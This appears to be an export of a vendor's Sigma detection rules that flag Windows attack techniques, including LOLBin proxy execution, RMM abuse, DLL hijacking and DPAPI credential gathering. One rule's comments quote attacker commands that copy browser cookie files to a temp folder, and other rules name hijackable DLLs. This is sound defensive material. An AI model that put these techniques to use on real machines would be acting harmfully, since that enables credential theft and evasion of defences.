"content": "title: Suspicious AddInutil.exe Command-Line\nid: 5353f2e2-31d5-43e8-a979-c50711169465\ndescription: |\n Detects suspicious command-line arguments for the Add-In deployment cache updating utility (AddInutil.exe).\n Adversaries can use this utility to proxy the execution of malicious code, in an attempt to evade defense evasion.\n It is recommended to investigate the Addins.Store file contained in the folder after the Addinroot or the Pipelineroot argument.\nreferences:\n - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/10/27\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Addinutil\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_addinutil:\n OriginalFileName: 'AddInUtil.exe'\n\n selection_absolute_flags:\n CommandLine|contains:\n - '-AddInRoot:'\n - '-PipelineRoot:'\n\n selection_absolute_paths:\n CommandLine|contains:\n - '\\AppData\\Local\\Temp\\'\n - '\\Desktop\\'\n - '\\Downloads\\'\n - '\\Users\\Public\\'\n - '\\Windows\\Temp\\'\n\n selection_relative:\n CommandLine|contains:\n - '-AddInRoot:.'\n - '-AddInRoot:\".\"'\n - '-PipelineRoot:.'\n - '-PipelineRoot:\".\"'\n CurrentDirectory|contains:\n - '\\AppData\\Local\\Temp\\'\n - '\\Desktop\\'\n - '\\Downloads\\'\n - '\\Users\\Public\\'\n - '\\Windows\\Temp\\'\n\n condition: selection_addinutil and (all of selection_absolute_* or selection_relative)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5353f2e2-31d5-43e8-a979-c50711169465",
"rule_name": "Suspicious AddInutil.exe Command-Line",
"rule_description": "Detects suspicious command-line arguments for the Add-In deployment cache updating utility (AddInutil.exe).\nAdversaries can use this utility to proxy the execution of malicious code, in an attempt to evade defense evasion.\nIt is recommended to investigate the Addins.Store file contained in the folder after the Addinroot or the Pipelineroot argument.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "535ea48e-2ee6-4997-83af-3260d094d0d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625990Z",
"creation_date": "2026-03-23T11:45:34.625992Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625996Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_simplehelp_process_execution.yml",
"content": "title: Process Executed via SimpleHelp RMM\nid: 535ea48e-2ee6-4997-83af-3260d094d0d1\ndescription: |\n Detects the execution of a process executed through SimpleHelp, a legitimate remote access tool.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2025/06/20\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.SimpleHelp\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\Remote Access.exe'\n GrandparentImage|endswith: '\\session_win.exe'\n\n filter_legitimate:\n Image:\n - '?:\\Windows\\System32\\netsh.exe'\n - '?:\\Windows\\System32\\cacls.exe'\n - '*-complete\\winpty-agent64.exe'\n - '*-complete\\elev_win.exe'\n - '?:\\Windows\\System32\\icacls.exe'\n\n exclusion_legitimate_commandline:\n CommandLine:\n - 'cscript ?:\\Windows\\System32\\Printing_Admin_Scripts\\\\??-??\\prnmngr.vbs -d -p SimpleHelp Remote Printer'\n - 'cscript ?:\\Windows\\System32\\Printing_Admin_Scripts\\\\??-??\\prnport.vbs -d -r IP_127.0.0.1_9109'\n - 'cmd.exe /c driverquery'\n - 'cmd.exe /c schtasks'\n - 'cmd.exe /c sc query'\n - 'cmd.exe /c ipconfig /all'\n - 'cmd.exe /c systeminfo'\n - 'cmd.exe /c ver'\n - 'wmic partition get name,size,type'\n - 'wmic diskdrive get name,size,model'\n - 'wmic bios get name,serialnumber,version'\n - 'wmic csproduct get name,vendor,IdentifyingNumber'\n - 'wmic get bios serialnumber'\n - 'cmd.exe /c wmic printjob'\n - 'cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname'\n - 'cmd.exe /c net use'\n - 'cmd.exe /c net share'\n - 'netstat -a'\n - 'cmd.exe /c echo Computer: %COMPUTERNAME% & echo Username: %USERNAME% & echo Domain: %USERDOMAIN% & echo Logon Server: %LOGONSERVER% & echo DNS Domain: %USERDNSDOMAIN% & echo User Profile: %USERPROFILE% & echo System Root: %SYSTEMROOT%'\n - 'wmic.exe /namespace:\\\\root\\SecurityCenter2 PATH AntiSpywareProduct get'\n - 'wmic.exe /namespace:\\\\root\\SecurityCenter2 PATH AntiVirusProduct get'\n - 'wmic.exe /namespace:\\\\root\\SecurityCenter2 PATH FirewallProduct get'\n - 'cmd.exe /c netsh advfirewall show all State'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "535ea48e-2ee6-4997-83af-3260d094d0d1",
"rule_name": "Process Executed via SimpleHelp RMM",
"rule_description": "Detects the execution of a process executed through SimpleHelp, a legitimate remote access tool.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "537c3c63-0a1d-4237-b175-bca6900b2cce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609317Z",
"creation_date": "2026-03-23T11:45:34.609321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609329Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://github.com/M2Team/NSudo",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1059_execution_of_nsudo.yml",
"content": "title: NSudo Execution\nid: 537c3c63-0a1d-4237-b175-bca6900b2cce\ndescription: |\n Detects the execution of NSudo.\n NSudo is an executable containing many system administration tools that allows to launch programs with full privileges.\n NSudo can be used by attackers to perform various actions while evading defenses.\n It is recommended to investigate determine whether the usage of NSudo is considered legitimate administrative behavior in this organization to determine if this action is legitimate.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://github.com/M2Team/NSudo\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.execution\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NSudo\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName:\n - 'NSudoL.exe'\n - 'NSudo.exe'\n - Image|endswith:\n - '\\NSudoLG.exe'\n - '\\NSudoLC.exe'\n - '\\NSudoL.exe'\n - '\\NSudo.exe'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "537c3c63-0a1d-4237-b175-bca6900b2cce",
"rule_name": "NSudo Execution",
"rule_description": "Detects the execution of NSudo.\nNSudo is an executable containing many system administration tools that allows to launch programs with full privileges.\nNSudo can be used by attackers to perform various actions while evading defenses.\nIt is recommended to investigate determine whether the usage of NSudo is considered legitimate administrative behavior in this organization to determine if this action is legitimate.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5380e454-9b74-48ec-8cb3-438df8ed7659",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083177Z",
"creation_date": "2026-03-23T11:45:34.083179Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083183Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_powershell_direct_drive_access.yml",
"content": "title: Direct Volume Access from DOS Path via PowerShell\nid: 5380e454-9b74-48ec-8cb3-438df8ed7659\ndescription: |\n Detects a direct volume access from a DOS path in a PowerShell script.\n Attackers may directly access a volume to bypass file access controls and file system monitoring.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1006/\ndate: 2021/12/13\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'New-Object IO.FileStream'\n - '\"\\\\.\\?:\"'\n - '.Read('\n - '.Close()'\n - \"'Open', 'Read', 'ReadWrite'\"\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5380e454-9b74-48ec-8cb3-438df8ed7659",
"rule_name": "Direct Volume Access from DOS Path via PowerShell",
"rule_description": "Detects a direct volume access from a DOS path in a PowerShell script.\nAttackers may directly access a volume to bypass file access controls and file system monitoring.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53817af8-8645-4335-b392-2d0268564b09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599255Z",
"creation_date": "2026-03-23T11:45:34.599259Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599266Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_programdata_environment_variable_modification.yml",
"content": "title: ProgramData User Environment Variable Modified\nid: 53817af8-8645-4335-b392-2d0268564b09\ndescription: |\n Detects when the ProgramData user environment variable is being modified.\n Attackers can change this environment variable to redirect execution of vulnerable applications or for the preparation of the CompMgmtLauncher.exe UACBypass.\n This should not be normally defined in the user environment variables.\n It is recommended to analyze the process responsible for this registry modification as well to as to look for other malicious behavior or UAC bypasses following this alert.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/10/16\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Environment\\programdata'\n\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType: 'RenameValue'\n NewName: 'HKU\\\\*\\Environment\\programdata'\n\n condition: (selection_set_value and not filter_empty) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53817af8-8645-4335-b392-2d0268564b09",
"rule_name": "ProgramData User Environment Variable Modified",
"rule_description": "Detects when the ProgramData user environment variable is being modified.\nAttackers can change this environment variable to redirect execution of vulnerable applications or for the preparation of the CompMgmtLauncher.exe UACBypass.\nThis should not be normally defined in the user environment variables.\nIt is recommended to analyze the process responsible for this registry modification as well to as to look for other malicious behavior or UAC bypasses following this alert.\n",
"rule_creation_date": "2020-10-16",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53a9e918-581b-438c-846f-3eb2cbe098a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600192Z",
"creation_date": "2026-03-23T11:45:34.600195Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600202Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdmappinstaller.yml",
"content": "title: DLL Hijacking via mdmappinstaller.exe\nid: 53a9e918-581b-438c-846f-3eb2cbe098a2\ndescription: |\n Detects potential Windows DLL Hijacking via mdmappinstaller.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdmappinstaller.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\iri.dll'\n - '\\msi.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53a9e918-581b-438c-846f-3eb2cbe098a2",
"rule_name": "DLL Hijacking via mdmappinstaller.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdmappinstaller.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53f19997-8649-4b9f-8d36-bf6148563d24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088506Z",
"creation_date": "2026-03-23T11:45:34.088508Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088512Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chkdsk.yml",
"content": "title: DLL Hijacking via chkdsk.exe\nid: 53f19997-8649-4b9f-8d36-bf6148563d24\ndescription: |\n Detects potential Windows DLL Hijacking via chkdsk.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chkdsk.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DEVOBJ.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53f19997-8649-4b9f-8d36-bf6148563d24",
"rule_name": "DLL Hijacking via chkdsk.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chkdsk.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5404c14d-2047-4c33-ac6d-2f18e200d173",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093722Z",
"creation_date": "2026-03-23T11:45:34.093724Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093736Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/zblurx/dploot",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1555/003/",
"https://attack.mitre.org/techniques/T1003/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1555_003_dploot_commandline.yml",
"content": "title: DPAPI Sensitive Files Gathered via NetExec/DonPAPI\nid: 5404c14d-2047-4c33-ac6d-2f18e200d173\ndescription: |\n Detects sensitive file gathering via dploot.\n dploot is a Python module specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials, it is used in tool such as DonPAPI and NetExec.\n DPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular by browsers.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/zblurx/dploot\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1555/003/\n - https://attack.mitre.org/techniques/T1003/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2024/10/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.credential_access\n - attack.t1555.003\n - attack.t1003\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Dploot\n - classification.Windows.HackTool.NetExec\n - classification.Windows.HackTool.DonPAPI\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # mmcexec\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine:\n # cmd.exe /Q /c copy C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA C:\\Windows\\Temp\\1728914362.695766\n # cmd.exe /Q /c copy C:\\Users\\Administrateur\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies C:\\Windows\\Temp\\1728908483.534047\n - 'cmd.exe /Q /c copy *\\\\* *Windows\\Temp\\\\*'\n - 'cmd.exe /Q /c esentutl.exe *\\\\* *Windows\\Temp\\\\*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5404c14d-2047-4c33-ac6d-2f18e200d173",
"rule_name": "DPAPI Sensitive Files Gathered via NetExec/DonPAPI",
"rule_description": "Detects sensitive file gathering via dploot.\ndploot is a Python module specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials, it is used in tool such as DonPAPI and NetExec.\nDPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular by browsers.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-10-15",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1047",
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "541b8dbb-5c51-45c6-a1c0-c427bc3f566d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604492Z",
"creation_date": "2026-03-23T11:45:34.604496Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604503Z",
"rule_level": "critical",
